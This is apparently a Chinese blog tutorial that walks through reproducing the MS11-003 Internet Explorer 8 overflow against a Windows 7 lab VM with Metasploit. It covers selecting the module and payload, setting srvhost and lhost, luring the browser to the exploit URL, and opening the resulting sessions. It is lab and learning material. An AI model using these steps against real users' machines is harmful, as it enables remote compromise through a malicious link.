经典漏洞MS11_003漏洞复现（windows7IE溢出漏洞）

1.首先打开kali虚拟机和一台windows7 ie8，在windows7查看ip，要想复现需要将windows7的防火墙关闭。

2.在kali虚拟机中ping该虚拟机，查看是否可以ping通。

3.打开msfconsole工具

search ms11_003
 

use 上面name下的内容粘贴下来

4.show payloads我们选择这一条payloads

 

5.输入如下的命令 set payloads +name

 

6.输入ifconfig查看本机kali的ip地址

7.set srvhost +刚才查询的ip

  set lhost +刚才查询的ip

8.show options 查看配置情况

9.设置uripath

set uripath +任意输入（例如00）

10.开始运行run/exploit,会出现一个URL将其复制下来，粘贴到windows7的ie浏览器中

11.出现如下情况，则连接成功

12.sessions 查看会话

13 sessions +ID（例如 sessions 2）

选择sessions会话的时候可能会连接不成功，那么换一个sessions即可

好啦关于win7的ie漏洞复现就到这里了，有什么问题欢迎指正（^..^)